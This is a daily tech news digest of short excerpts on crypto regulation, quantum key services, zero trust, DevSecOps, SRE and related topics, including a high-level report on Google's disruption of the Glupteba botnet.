Interestingly, crypto investors are open to the idea of greater regulation in the market, for the most part. Based on data from GWI, 46% of crypto investors say they support regulation, and this rises to more than half of consumers who say they already use crypto for transactions. Many investors think regulation will work to normalise the budding digital economy. These optimistic crypto enthusiasts hope that some regulation (emphasis on the “some”) will allow more businesses to accept crypto as payment for goods and services, and put crypto on the same plan as conventional money. However, these same investors also worry that any regulation will severely limit the things they value most about crypto. Over a third of current investors predict regulation will result in more government surveillance and reduce the privacy and anonymity currently guaranteed by crypto. The free and anonymous nature of crypto is often used to paint it as a force democratising finance, but the prospect of regulation makes it clear that this future could be on the chopping block.


"Hello Quantum World:" New cybersecurity service uses entanglement to generate cryptographic keys

The product supports RSA and AES algorithms as well as the post-quantum cryptography algorithms being standardized by the National Institute for Standards and Technology. The service is priced per key generated for customers. Jones said that the company has export controls in place to screen customers who want to use the service. "As part of our customer onboard process, we do due diligence to make sure use cases and destination countries are all above board," he said. Khan described Quantum Origin as a defensive technology as opposed to an adversarial one. "We are focused on protecting the technology that creates the key, not selling it," he said. "We are selling the product created by that technology." Cambridge Quantum will offer the new service to financial services companies and cybersecurity vendors initially and later to telecommunications, energy, manufacturing, defense and governments. ... In a proof-of-concept project, Fujitsu used the service in its software-defined wide area network using quantum-enhanced keys with traditional algorithms. 


How will emerging technologies impact the data storage landscape?

Dependence on technology providers and cloud services based outside of their geographies is an increasing concern for global enterprises. Data sovereignty regulations, such as the Data Governance Act in Europe, are an indication of the acknowledged power of data and its increasing role as the emerging currency for digital transformation. Companies are struggling to keep track of the location of their data and meet compliance with local regulations. This will usher in an industry of local and regional service providers offering sovereign cloud services to captive markets by ensuring the data stays within specified borders. ... Even as public cloud investment continues, enterprises will maintain their corporate on-premises data centre infrastructure for reasons of control, performance and cost-efficiency. This will lead to a new level of sophisticated IT management capabilities to optimise multi-data centre, multi-cloud application and data management solutions. 


Zero Trust Private Networking Rules

SaaS applications and Zero Trust Networking solutions like Cloudflare Access have made it easier to provide a secure experience without a VPN. Administrators are able to configure controls like multi-factor authentication and logging alerts for anomalous logins for each application. Security controls for public-facing applications have far outpaced applications on private networks. However, some applications still require a more traditional private network. Use cases that involve thick clients outside the browser or arbitrary TCP or UDP protocols are still better suited to a connectivity model that lives outside the browser. We heard from customers who were excited to adopt a Zero Trust model, but still needed to support more classic private network use cases. To solve that, we announced the ability to build a private network on our global network. Administrators could build Zero Trust rules around who could reach certain IPs and destinations. End users connected from the same Cloudflare agent that powered their on-ramp to the rest of the Internet. However, one rule was missing.


Natural language processing is shaping intelligent automation

Unstructured information management platforms allow you to automate a lot of research work: for example, lawyers can use them to run intelligent queries over existing patents or case law, and medical researchers can use them in drug discovery or look for relevant gene interactions in the literature. Rather than spending time poring over reams of documents, a human researcher can quickly review the suggestions and insights provided by the UIM platform, making them more productive overall and freeing up their time and mental energy for the more creative and high-level aspects of the job. ... You can use sentiment analysis to perform automatic real-time monitoring of consumer reactions to your brand, especially in response to a new product launch or ad campaign, which will help you to tailor your future products and services accordingly. It can also automatically alert you to any eruptions of criticism or negativity about your brand on social media, without the need for human staff actively monitoring channels 24/7, so that you can respond in time to avert a PR crisis.


Managing Compliance with Continuous Delivery

A typical enterprise application might comprise hundreds of small processes called microservices. Validating the compliance and regulation checks on hundreds of different applications is more manageable than one extensive application. This is because you can easily pin and regulate a noncompliant process during deployment checks. If a microservice isn’t compliant, the team rejects the deployment for that microservice only, not the entire stack. This rejection also alerts the developers responsible for the microservice’s maintenance to ensure compliance in their codebase. Sometimes it’s not technically possible to debug and run the solution locally. For example, if your teams must provision and analyze the logs your app generates, it might not be feasible to run the entire cluster on a developer machine. However, provisioning a test or development environment for every team is expensive in licensing, hardware and staffing. In contrast, with microservices, each team can run their project locally, ensure compliance, and then push it for deployment. 


IT careers: 5 secrets to making a successful change

The fear of being rejected prevents some IT professionals from going after their dreams. But rejection is a fact of life. Failure is always possible when you take risks, so you can’t let that hold you back. Instead, turn your fears into fuel. Before you make a career jump, practice what rejection feels like in small doses. Put yourself in low-risk situations where you can build your muscle for rejection. For instance, if you’re an IT professional just getting started at a new company, offer to perform a planned email migration or server maintenance updates.  ... Think of this as a mirage of uncertainty. Begin a daily practice in which you move beyond the shadow of a doubt. There is a proven power in imagining yourself succeeding in what you’re about to do. If you are doing something new, reframe your inexperience by reminding yourself that you’re not expected to be an expert immediately. Expertise only comes with time. Finally, give yourself the same advice your best friend would give you. This exercise can be a great way to keep you from harboring negative thoughts.


Observability: It’s Not What You Think

Monitoring tells you something is wrong, but it doesn’t tell you why it’s wrong. Monitoring setups also can only monitor things you’ve already thought could be problematic (your ‘known knowns’.) If you didn’t think to instrument the component in question in advance, you can’t monitor it. What’s worse, if you then have a problem there and decide to add monitoring to it, you still don’t have the historical data about how the component performed. Also, monitoring requires special attention before you even know what could go wrong – you have to specifically instrument-specific things and set up specific alerts about them. This takes time and is prone to errors. Also, no matter how well-instrumented your monitoring solution is, it still doesn’t let you explore your business. Looking into ‘unknown unknowns’ isn’t possible with a classic monitoring system, because the data simply doesn’t exist for you to evaluate. Adding in business metrics is generally not supported or poorly supported in traditional monitoring. 



Quote for the day:

"Before you are a leader, success is all about growing yourself. When you become a leader, success is all about growing others" -- Jack Welch

Daily Tech Digest - December 09, 2021

How should we regulate DeFi?

There is opportunity for the appropriate level of regulation to give DeFi enough breathing space to make a difference: boosting transparency, increasing financial inclusion and enabling credit to 8 billion people that will see the world take a tremendous jump toward prosperity. Yet there is also potential for overreach that would stifle innovation and growth and have unintended consequences. Unfortunately, we seem to be well down this path already. What is needed is the realization that DeFi shares many of the same goals as financial regulators: overhauling inflexible processes and delivering wider access, cheaper prices and more stability — all while ensuring these benefits are widely shared with all participants in the market. ... DeFi has the potential to create fairer, more transparent and more liquid markets through completely new mechanisms, helping everyone to reduce fraud and front-running, resolving fragmentation and creating markets that are efficient, resilient, fair and equally accessible to all — not just participants that have the right connections.


How to make agile actually work for analytics

The most striking difference between what we do and what software developers do is in our end products. In software, the goal is to get to a product that the end-user loves. In data, our goal is to help people make a decision they trust, and the journey the user takes to get there can be just as important as the end result. Most commonly we see this manifested in how we tell stories with our data. We use notebooks to capture context and process, and presentations to guide users to an understanding. It’s in this process that we establish trust, turn charts into insights, and make our data valuable. This is also the driver behind one of the greatest pains of our work: the follow-up questions, and ad-hoc requests. These questions and requests come from a place of curiosity and represent a desire to have that same intimate understanding of data that we get in crafted data stories. And yet, in practice, we try to eliminate these questions with processes that front-load requirements gathering and tools that have made no room for this way of working.


Cloudentity SaaS platform enables zero trust access control for APIs

Deployable in minutes, Cloudentity empowers businesses to deliver Open Banking, Embedded Finance and other innovative online services without changing identity providers or application code. Cloudentity delivers a declarative identity and authorization framework that works across any cloud to simplify access control and data governance. From Open Banking to eCommerce fraud prevention, Cloudentity makes it easier to deliver cloud-native applications and safer to extend your data to the customers and partners that matter most. A standout capability of the new SaaS platform is its drag and drop Data Lineage feature, which provides a simple and intuitive way of mapping identity and user context data to an application. For developers, Data Lineage solves the complexities of Single Sign On (SSO) and provides real-time control over who can access each element of your API data. For ITops, DevOps and SecurityOps, teams can rapidly validate controls and pinpoint areas that need to be updated or fixed to prevent API data leakage and meet personal data protection obligations.


SaaS DR/BC: If You Think Cloud Data is Forever, Think Again.

Humans and technology have always had co-dependent challenges. Let’s face it, it’s one of the main reasons my career exists! So it stands to reason that human inference, whether deliberate or not, is a common reason for losing information. This can be as innocuous as uploading a CSV file that corrupts data sets, accidentally deleting product listings, or overwriting code repositories with a forced push. There’s also intentional human interference. This means someone who has authorized access, nuking a bunch of stuff. It may sound far-fetched but we have seen terminated employees or third-party contractors cause major issues. It’s not very common, but it happens. Cyberthreats are next on the list, which are all issues that most technical operations teams are used to. Most of my peers are aware that the level of attacks increased during the global pandemic, but the rate of attacks had already been increasing prior to COVID-19. Ransomware, phishing, DDoS, and more are all being used to target and disrupt business operations. If this happens, data can be compromised or completely wiped out.


Starting an SRE Team? Stay Away From Uptime.

Why shouldn't you be too concerned about your uptime metrics? In reality SRE can mean different things to different teams but at its core, it’s about making sure your service is reliable. After all, it’s right there in the name. Because of this many people assume that uptime is the most valuable metric for SRE teams. That is flawed logic. For instance, an app can be “up” but if it’s incredibly slow or its users don’t find it to be practically useful, then the app might as well be down. Simply keeping the lights on isn’t good enough and uptime alone doesn’t take into account things like degradation or if your site’s pages aren’t loading. It may sound counterintuitive, but SRE teams are in the customer service business. Customer happiness is the most important metric to pay attention to. If your service is running well and your customers are happy, then your SRE team is doing a good job. If your service is up and your customers aren’t happy, then your SRE team needs to reevaluate. A more holistic approach is to view your service in terms of health.
 

An opportunity is coming to drive up the number of women in tech

Another key element is creating the right culture and environment for diversity to thrive. In a gender context, an important aspect here is male allyship. Men have a real role to play in supporting the ‘levelling up’ agenda. They need to see that increasing gender diversity and equity is not just an issue for women themselves – it’s for everyone. They can become active allies through their own behaviours and actions. This extends right up to board level and executive leadership. We need to continue to work to influence leader behaviour and build their understanding of people’s different styles. Instances of men talking over women in the boardroom or not listening to ideas are still all too common. Reporting is also critical. You can’t change what you don’t measure. Collating diversity statistics and reporting them to the board and more widely around the business is an essential part of raising awareness and stimulating action. Transparent reporting was in fact seen as the most effective lever for improving diversity and inclusion in this year’s survey.


Is the “great resignation” coming for you?

When employees feel their personal ambitions are too difficult to achieve, they start to think about leaving. Those ambitions might involve having a family while maintaining a career, gaining a range of professional experiences, or even accumulating personal experiences such as travel. People will ask: “I don’t mind making sacrifices, but are the trade-offs producing the benefits I expected?” When that question surfaces, employees are already halfway out the door. For example, young men and women who are working extremely hard and don’t have time for friends, exercise, or adventures may start to doubt that the company is the right place for them—even if the pay is fabulous. ... Managers often show great care about performance and little concern about the whole person who is delivering the results. Feeling uncared for is deadly for motivation and destructive to performance over the long run. Many managers rarely ask about other aspects of their team members’ lives, their personal interests, or their ambitions. Too few managers show genuine understanding and appreciation for what it took to deliver such great results.


DevSecOps jobs: 3 ways to get hired

Automation is a major part of DevSecOps, and this requires the use of multiple software applications and tools. For example, companies use a variety of different application security testing tools (ASTs), which are essential to ensure that the code being used in development is safe and to prevent malicious packages from being introduced. These tools can be static (SAST), dynamic (DAST), and interactive (IAST) and they can also be from different vendors. Some may include automated vulnerability detection, prioritization, and even remediation capabilities that can address issues without requiring IT staff to spend much time researching vulnerabilities. The lesson: Many different tools are used in DevSecOps, and these will likely change as new innovations are introduced. Stay informed and updated on industry trends, especially if you are early in your journey because the tools and needs of today might be very different in a few years’ time. The idea behind shifting left and DevSecOps is to break down the traditional separation between developers, security, and IT professionals.


Google TAG Disrupts Blockchain-Enabled Botnet

Google is skeptical about the complete disruption of Glupteba's operations. It says: "The operators of Glupteba are likely to attempt to regain control of the botnet using a backup command and control mechanism that uses data encoded on the Bitcoin blockchain." The botnet also has a feature that allows it to evade traditional takedowns. TAG says that a conventional botnet-infected device looks for predetermined domain addresses that point to the C2 server. The instructions to locate these domains are hard-coded in the malware installed on the victim's device. If the predetermined domains are taken down by law enforcement agencies or others, the infected devices can no longer receive instructions from the C2 servers and therefore can no longer be operated by the bot controller. The Glupteba botnet, however, does not rely solely on predetermined domains to ensure its survival, the TAG researchers. They say that when the botnet’s C2 server is interrupted, Glupteba malware is hard-coded to search the public Bitcoin blockchain for transactions involving three specific Bitcoin addresses that are controlled by the Glupteba botnet operators.


You’re Doing it Wrong: It’s Not About Data and Applications – It’s About Processes

We often model processes to document them, to validate them with stakeholders, to teach them to others – and most of all, to improve them. In far too many companies, what they do and why they do it is implicit, not communicated well, and invites plenty of competing points of view as to what it really is. You need to tackle the process first before you attempt to automate any of its tasks. Not doing so would be like digging holes with a crane instead of a shovel, but without thinking about whether the holes are being dug in the right places (or should be dug at all). It’s not enough to think about saving time and money. Automating a process (not just its activity) documents it, makes it teachable and scalable, and goes a long way to reducing or eliminating mistakes (high profile errors can be a major catalyst for process automation). It also makes a process easily audited and monitored And it’s a lot easier to figure out how to improve a process you can see. And improvement is a must; if there’s one thing to expect when it comes to process automation, it’s change.



Quote for the day:

"Great Groups need to know that the person at the top will fight like a tiger for them." -- Warren G. Bennis